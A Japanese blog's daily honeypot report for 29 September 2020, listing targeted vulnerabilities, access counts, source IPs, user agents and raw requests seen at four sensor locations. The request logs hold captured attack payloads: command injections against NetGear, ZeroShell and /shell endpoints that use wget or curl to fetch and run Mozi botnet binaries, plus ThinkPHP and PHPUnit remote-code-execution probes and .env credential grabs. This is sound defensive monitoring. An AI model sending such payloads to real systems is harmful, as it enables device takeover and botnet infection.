コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/09/29 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/09/29分です。

特徴
Location:JP

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:US

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
Nmapによるスキャン行為
XTCによるスキャン行為
Wgetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//186[.]29[.]27[.]219:37147/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

DrayTek製品の脆弱性を狙うアクセス
FCKEditorの脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
Nmapによるスキャン行為
XTCによるスキャン行為
Wgetによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location:SG

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

アクセス数推移

JP:総アクセス数:153 (前日比:+112)
US:総アクセス数:135 (前日比:+97)
UK:総アクセス数:89 (前日比:+54)
SG:総アクセス数:125 (前日比:+48)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.83.163.84 Germany
1 5.188.210.227 Russia
1 45.141.87.7 Russia
2 45.148.10.28 Italy
10 49.232.17.254 China
1 52.151.119.133 United States
1 54.38.47.219 France
1 78.106.94.196 Russia
1 89.203.251.112 Czechia
4 94.102.49.190 Netherlands
1 94.102.51.119 Netherlands
1 115.49.124.142 China
101 123.54.229.88 China
4 132.145.189.81 United States
1 142.93.243.0 United States
7 176.113.115.214 Russia
1 185.39.11.105 Switzerland
1 185.153.196.226 Russia
1 191.232.246.255 Brazil
1 192.241.216.216 United States
1 192.241.234.251 United States
10 218.201.82.167 China

UserAgent一覧

件数 UserAgent
8 -
2 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 python-requests/2.24.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
6 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /CFIDE/administrator/ HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/.env HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//78[.]106[.]94[.]196:38213/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /storage/.env HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 39.79.186.245 China
27 40.86.223.86 United States
1 45.141.87.7 Russia
2 45.148.10.28 Italy
1 61.219.11.153 Taiwan
1 65.52.18.46 United States
1 89.203.249.108 Czechia
1 94.102.51.119 Netherlands
1 104.131.54.149 United States
1 113.220.112.101 China
10 120.27.218.131 China
7 147.139.29.88 United States
10 159.89.144.55 United States
1 162.243.129.4 United States
12 176.113.115.214 Russia
1 182.121.113.169 China
1 185.39.11.105 Switzerland
1 186.154.46.215 Colombia
1 199.195.254.38 United States
1 207.102.21.5 Canada
52 208.91.110.34 United States
1 222.137.163.164 China

UserAgent一覧

件数 UserAgent
36 -
1 Go-http-client/1.1
1 Hello, World
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
52 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
1 Mozilla/5.0 zgrab/0.x
1 Wget/1.18 (linux-gnu)
1 XTC

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x03
2 \x16\x03\x01\x02
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 GET ../../proc/ HTTP
2 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Account/ HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Line/ HTTP/1.1
1 GET /Lines/ HTTP/1.1
1 GET /SPA112/ HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /Telephone/ HTTP/1.1
1 GET /aastra/ HTTP/1.1
1 GET /ab/tftpboot/ HTTP/1.1
1 GET /adminer-3.7.1.php HTTP/1.1
1 GET /api.php HTTP/1.1
1 GET /asterisk/ HTTP/1.1
1 GET /ata/ HTTP/1.1
1 GET /backup/ HTTP/1.1
1 GET /backups/ HTTP/1.1
1 GET /bkp/ HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /cfg/ HTTP/1.1
27 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /cisco/ HTTP/1.1
1 GET /client_area/ HTTP/1.1
1 GET /conf/ HTTP/1.1
1 GET /config/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /configs/ HTTP/1.1
1 GET /digium/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /etc/ HTTP/1.1
1 GET /etc/asterisk/ HTTP/1.1
1 GET /etc/asterisk/extensions.conf/ HTTP/1.1
1 GET /etc/sip.txt/ HTTP/1.1
1 GET /etc/sip/ HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /gateway/ HTTP/1.1
1 GET /grandstream/ HTTP/1.1
1 GET /gravacoes/ HTTP/1.1
1 GET /gs/ HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
2 GET /linksys/ HTTP/1.1
1 GET /login.php HTTP/1.1
1 GET /mitel/ HTTP/1.1
1 GET /nmaplowercheck1601264180 HTTP/1.1
1 GET /phones/ HTTP/1.1
1 GET /polycom/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /prov/ HTTP/1.1
1 GET /prov_l/ HTTP/1.1
1 GET /provision/ HTTP/1.1
1 GET /provisioning/ HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//186[.]29[.]27[.]219:37147/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sip.txt/ HTTP/1.1
1 GET /sip/ HTTP/1.1
1 GET /sipura/ HTTP/1.1
1 GET /snom/ HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spa/ HTTP/1.1
1 GET /ssl/ HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /streaming HTTP/1.1
2 GET /streaming/clients_live.php HTTP/1.1
1 GET /streaming/k6gAJZ8eZ.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /tftp/ HTTP/1.1
1 GET /tftpboot/ HTTP/1.1
1 GET /tftpphone/ HTTP/1.1
1 GET /tftproot/ HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /txt/ HTTP/1.1
1 GET /var/ HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /voip/ HTTP/1.1
1 GET /xml/ HTTP/1.1
1 GET /yealink/ HTTP/1.1
1 GET /yeastar/ HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 39.65.223.93 China
2 45.141.87.7 Russia
2 45.148.10.28 Italy
7 47.241.13.24 United States
1 61.219.11.153 Taiwan
6 89.248.172.149 Netherlands
6 93.174.93.149 Netherlands
1 94.20.64.42 Azerbaijan
1 94.102.51.119 Netherlands
10 115.159.226.53 China
9 176.113.115.214 Russia
13 181.127.224.152 Paraguay
1 192.241.214.170 United States
1 199.195.254.38 United States
27 201.230.120.5 Peru
1 202.83.42.176 India

UserAgent一覧

件数 UserAgent
35 -
1 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
12 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
1 Mozilla/5.0 zgrab/0.x
1 Wget/1.18 (linux-gnu)
1 XTC
12 ZmEu

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x03
2 \x16\x03\x01\x02
1 GET ../../proc/ HTTP
1 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /admin/includes/general.js HTTP/1.1
1 GET /admin/view/javascript/common.js HTTP/1.1
1 GET /administrator/ HTTP/1.1
1 GET /administrator/help/en-GB/toc.json HTTP/1.1
1 GET /administrator/language/en-GB/install.xml HTTP/1.1
27 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/editor/separator.gif HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /js/header-rollup-554.js HTTP/1.1
1 GET /misc/ajax.js HTTP/1.1
2 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /nmaplowercheck1601246119 HTTP/1.1
2 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
2 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /plugins/system/debug/debug.xml HTTP/1.1
2 GET /pma/scripts/setup.php HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/build.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /wp-includes/js/jquery/jquery.js HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 45.148.10.28 Italy
1 54.38.47.219 France
1 60.209.253.219 China
1 61.219.11.153 Taiwan
1 68.183.60.36 United States
1 94.102.51.119 Netherlands
1 120.56.119.196 India
101 171.14.102.105 China
12 176.113.115.214 Russia
1 192.241.237.127 United States
1 198.199.106.251 United States
2 199.195.254.38 United States

UserAgent一覧

件数 UserAgent
6 -
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
2 GET ../../proc/ HTTP
2 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//60[.]209[.]253[.]219:39440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1